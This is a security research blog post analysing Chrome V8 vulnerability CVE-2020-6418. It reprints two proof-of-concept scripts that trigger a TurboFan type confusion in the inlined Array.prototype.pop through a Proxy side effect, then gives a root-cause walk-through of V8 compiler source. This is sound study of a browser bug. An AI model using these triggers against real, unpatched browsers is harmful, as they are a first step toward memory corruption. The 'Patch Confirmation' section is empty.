Introduction:
Chrome vulnerabilities have been quite a hot topic for the past couple of years, and many of them were caught being exploited in the wild. While most of the ones we looked at were quite interesting, one bug caught our attention and we wanted to dig into it more deeply: CVE-2020-6418.
Multiple parties have published blog posts about how to exploit this vulnerability. Nevertheless, we decided to go ahead and try to exploit it on Linux ourselves.
In this first part of the two-part series, we will walk through the PoC we developed along with a root-cause analysis of the vulnerability. Exploitation will be covered in the second part.
Analyzing the PoC:
The publicly available PoC:
'use strict';
(function() {
  var popped;

  function trigger(new_target) {
    function inner(new_target) {
      function constructor() {
        popped = Array.prototype.pop.call(array);
        for (var i = 0; i < 0x10000; ++i) {};
      }
      var temp = array[0];
      for (var i = 0; i < 0x10000; ++i) {};
      return Reflect.construct(constructor, arguments, new_target);
    }
    inner(new_target);
  }

  var array = new Array(0, 0, 0, 0, 0);
  for (var i = 0; i < 20000; i++) {
    trigger(function() { });
    array.push(0);
    for (var i = 0; i < 0x10000; ++i) {};
  }

  var proxy = new Proxy(Object, {
    get: () => (array[4] = 1.1, Object.prototype)
  });

  trigger(proxy);
  print(popped);
}());
Unfortunately, running this PoC on the affected V8 version does not trigger the bug, due to pointer compression.
After investigating the patch commit for the vulnerability, we noticed a regression test for the bug along with the patched file in TurboFan. Based on that regression test, we developed the following PoC:
let a = [0, 1, 2, 3, 4];
function empty() {}
function f(p) {
  return a.pop(Reflect.construct(empty, arguments, p));
}
let p = new Proxy(Object, {
  get: () => (a[1] = 99999999.235434351, Object.prototype)
});
function main(p) {
  print(f(p));
}
%PrepareFunctionForOptimization(empty);
%PrepareFunctionForOptimization(f);
%PrepareFunctionForOptimization(main);
main(empty);
main(empty);
%OptimizeFunctionOnNextCall(main);
main(p);
Running the PoC with d8, the first two (unoptimized) calls pop 4 and 3 as expected, while the optimized call through the proxy prints a bogus value caused by the type confusion:
┌──(kali㉿kali)-[~/Desktop/x64.release]
└─$ ./d8 --allow-natives-syntax ../poc.js
4
3
-25654566
lock-type=
Root Cause Analysis:
Starting with our PoC, we noticed that this is a JIT bug: built-in JSArray functions such as push, pop, and shift are inlined by the compiler for the specific elements kind the array had at the time the code was JIT-compiled.
In the PoC, the variable a is declared as an integer array with the values [0, 1, 2, 3, 4], which means V8 creates an array whose elements kind is PACKED_SMI_ELEMENTS, an array of small integers (Smis) in V8 terminology.
When the JIT-compiled code runs, the proxy object that intercepts the 'prototype' access changes the array's elements kind from PACKED_SMI_ELEMENTS to PACKED_DOUBLE_ELEMENTS, which uses a different backing-store layout. This is where the type confusion occurs: when the inlined pop runs, it still treats the array as PACKED_SMI_ELEMENTS instead of its new kind, PACKED_DOUBLE_ELEMENTS.
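To make these two ingredients concrete, here is a minimal d8 sketch of our own (not part of the PoC; variable names are ours, d8 is assumed to be started with --allow-natives-syntax, and the detailed %DebugPrint output requires a debug or object-printing build). It shows that Reflect.construct reads 'prototype' from the new target, which fires the proxy's get trap, and that storing a double transitions the array's elements kind:

let arr = [0, 1, 2, 3, 4];            // created as PACKED_SMI_ELEMENTS
%DebugPrint(arr);                     // shows "elements kind: PACKED_SMI_ELEMENTS"

const demoProxy = new Proxy(Object, {
  get(target, prop) {
    print('proxy get trap: ' + String(prop));  // fires for 'prototype'
    arr[1] = 1.1;                     // side effect: transitions the elements kind
    return Reflect.get(target, prop);
  }
});

function ctor() {}
Reflect.construct(ctor, [], demoProxy);  // the trap runs in the middle of the construct
%DebugPrint(arr);                        // now "elements kind: PACKED_DOUBLE_ELEMENTS"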
We can deduce that the bug occurs because TurboFan does not account for this change of the array's elements kind: based on the function's context and the type feedback, it assumes the elements kind will never change. To understand the bug further, let's take a look at how TurboFan optimizes JSArray built-in functions.
TurboFan reduces calls to built-in functions by building a graph of nodes that accomplishes the same behavior as the original built-in, and then compiles that graph to machine code at a later stage.
v8/src/compiler/js-call-reducer.cc
Reduction JSCallReducer::ReduceJSCall(Node* node,
                                      const SharedFunctionInfoRef& shared) {
  DCHECK_EQ(IrOpcode::kJSCall, node->opcode());
  Node* target = NodeProperties::GetValueInput(node, 0);

  // Do not reduce calls to functions with break points.
  if (shared.HasBreakInfo()) return NoChange();

  // Raise a TypeError if the {target} is a "class constructor".
  if (IsClassConstructor(shared.kind())) {
    NodeProperties::ReplaceValueInputs(node, target);
    NodeProperties::ChangeOp(
        node, javascript()->CallRuntime(
                  Runtime::kThrowConstructorNonCallableError, 1));
    return Changed(node);
  }

  // Check for known builtin functions.
  int builtin_id =
      shared.HasBuiltinId() ? shared.builtin_id() : Builtins::kNoBuiltinId;
  switch (builtin_id) {
    case Builtins::kArrayConstructor:
      return ReduceArrayConstructor(node);
    case Builtins::kBooleanConstructor:
    // ... snip ...
    case Builtins::kArrayEvery:
      return ReduceArrayEvery(node, shared);
    case Builtins::kArrayIndexOf:
      return ReduceArrayIndexOf(node);
    case Builtins::kArrayIncludes:
      return ReduceArrayIncludes(node);
    case Builtins::kArraySome:
      return ReduceArraySome(node, shared);
    case Builtins::kArrayPrototypePush:
      return ReduceArrayPrototypePush(node);
    case Builtins::kArrayPrototypePop:
      return ReduceArrayPrototypePop(node);
Based on which built-in is being called, TurboFan picks the corresponding reducer. In our case, the reduction happens in ReduceArrayPrototypePop:
// ES6 section 22.1.3.17 Array.prototype.pop ( )
Reduction JSCallReducer::ReduceArrayPrototypePop(Node* node) {
  DisallowHeapAccessIf disallow_heap_access(should_disallow_heap_access());
  // ... snip ...
  Node* receiver = NodeProperties::GetValueInput(node, 1);
  Node* effect = NodeProperties::GetEffectInput(node);
  Node* control = NodeProperties::GetControlInput(node);

  MapInference inference(broker(), receiver, effect);
  if (!inference.HaveMaps()) return NoChange();
  MapHandles const& receiver_maps = inference.GetMaps();

  std::vector<ElementsKind> kinds;
  if (!CanInlineArrayResizingBuiltin(broker(), receiver_maps, &kinds)) {
    return inference.NoChange();
  }
  // ... snip ...

  // Load the "length" property of the {receiver}.
  Node* length = effect = graph()->NewNode(
      simplified()->LoadField(AccessBuilder::ForJSArrayLength(kind)), receiver,
      effect, control);

  // Check if the {receiver} has any elements.
  Node* check = graph()->NewNode(simplified()->NumberEqual(), length,
                                 jsgraph()->ZeroConstant());
  Node* branch =
      graph()->NewNode(common()->Branch(BranchHint::kFalse), check, control);

  Node* if_true = graph()->NewNode(common()->IfTrue(), branch);
  Node* etrue = effect;
  Node* vtrue = jsgraph()->UndefinedConstant();

  Node* if_false = graph()->NewNode(common()->IfFalse(), branch);
  Node* efalse = effect;
  Node* vfalse;
  {
    // TODO(tebbi): We should trim the backing store if the capacity is too
    // big, as implemented in elements.cc:ElementsAccessorBase::SetLengthImpl.

    // Load the elements backing store from the {receiver}.
    Node* elements = efalse = graph()->NewNode(
        simplified()->LoadField(AccessBuilder::ForJSObjectElements()), receiver,
        efalse, if_false);

    // Ensure that we aren't popping from a copy-on-write backing store.
    if (IsSmiOrObjectElementsKind(kind)) {
      elements = efalse =
          graph()->NewNode(simplified()->EnsureWritableFastElements(), receiver,
                           elements, efalse, if_false);
    }

    // Compute the new {length}.
    length = graph()->NewNode(simplified()->NumberSubtract(), length,
                              jsgraph()->OneConstant());

    // Store the new {length} to the {receiver}.
    efalse = graph()->NewNode(
        simplified()->StoreField(AccessBuilder::ForJSArrayLength(kind)),
        receiver, length, efalse, if_false);

    // Load the last entry from the {elements}.
    vfalse = efalse = graph()->NewNode(
        simplified()->LoadElement(AccessBuilder::ForFixedArrayElement(kind)),
        elements, length, efalse, if_false);

    // Store a hole to the element we just removed from the {receiver}.
    efalse = graph()->NewNode(
        simplified()->StoreElement(
            AccessBuilder::ForFixedArrayElement(GetHoleyElementsKind(kind))),
        elements, length, jsgraph()->TheHoleConstant(), efalse, if_false);
  }

  control = graph()->NewNode(common()->Merge(2), if_true, if_false);
  effect = graph()->NewNode(common()->EffectPhi(2), etrue, efalse, control);
  Node* value =
      graph()->NewNode(common()->Phi(MachineRepresentation::kTagged, 2), vtrue,
                       vfalse, control);
  // ... snip ...
  return Replace(value);
}
The function above builds a directed graph of value, effect, and control nodes that is chained into the original sea of nodes and produces the same result as calling the built-in function. This approach is dynamic and works for the different element kinds the receiver may have.
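As a rough JS-level sketch (our own illustration and naming, not V8 code), the reduced graph performs the following operations for a PACKED_SMI_ELEMENTS receiver. Here 'elements' stands in for the FixedArray backing store and HOLE for V8's hole marker; the key point is that the element accesses are built with AccessBuilder::ForFixedArrayElement(kind), so the elements kind is baked in at reduction time and never re-checked:

const HOLE = Symbol('the_hole');

function inlinedPopSketch(receiver) {
  let length = receiver.length;            // LoadField: JSArray length
  if (length === 0) return undefined;      // Branch on NumberEqual(length, 0)
  const elements = receiver.elements;      // LoadField: JSObject elements
  // (EnsureWritableFastElements for SMI/Object kinds is omitted in this sketch.)
  length = length - 1;                     // NumberSubtract(length, 1)
  receiver.length = length;                // StoreField: new JSArray length
  const value = elements[length];          // LoadElement: last entry, kind-specific
  elements[length] = HOLE;                 // StoreElement: write the hole
  return value;
}

// Usage in d8: a fake "JSArray" with an explicit backing store.
const fakeArray = { length: 3, elements: [10, 20, 30] };
print(inlinedPopSketch(fakeArray));        // 30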
In order for TurboFan to recognize and infer the type (map) of the object being optimized, it traverses backwards along the effect chain from the current node to locate where the object was allocated or where its map was last checked:
MapInference inference(broker(), receiver, effect);
if (!inference.HaveMaps()) return NoChange();
MapHandles const& receiver_maps = inference.GetMaps();

std::vector<ElementsKind> kinds;
if (!CanInlineArrayResizingBuiltin(broker(), receiver_maps, &kinds)) {
  return inference.NoChange();
}
The code above attempts to infer the type of the receiver object, and this is where the bug manifests: the inferred elements kind is used for the rest of the reduction, while the side effect introduced by the proxy can change the actual elements kind before the inlined pop executes.
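For contrast, here is a small d8 sketch of the normal, non-buggy behavior (our own example and naming, assuming d8 is started with --allow-natives-syntax): the optimized code is specialized for the maps observed during warm-up, and a receiver with a different elements kind simply fails the inserted map check and falls back to unoptimized code:

function popIt(a) { return a.pop(); }

%PrepareFunctionForOptimization(popIt);
popIt([1, 2, 3]);                 // feedback: PACKED_SMI_ELEMENTS receiver
popIt([4, 5, 6]);
%OptimizeFunctionOnNextCall(popIt);
print(popIt([7, 8, 9]));          // 9, via the inlined fast path

// A PACKED_DOUBLE_ELEMENTS receiver does not match the map(s) inferred above;
// the optimized code bails out (deoptimizes) instead of misinterpreting the
// backing store.
print(popIt([1.5, 2.5]));         // 2.5, handled correctly after the bailout

In the vulnerable pattern, by contrast, the map check passes when it is evaluated; the elements kind only changes afterwards, inside Reflect.construct via the proxy's get trap, and the inlined pop never re-validates it.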
Patch Confirmation:
In the next part, we’ll present the steps we used to exploit the type confusion vulnerability.
Stay tuned and as always, happy hunting!
Originally published by the Haboob Research Team: Exploring Chrome's CVE-2020-6418 – Part 1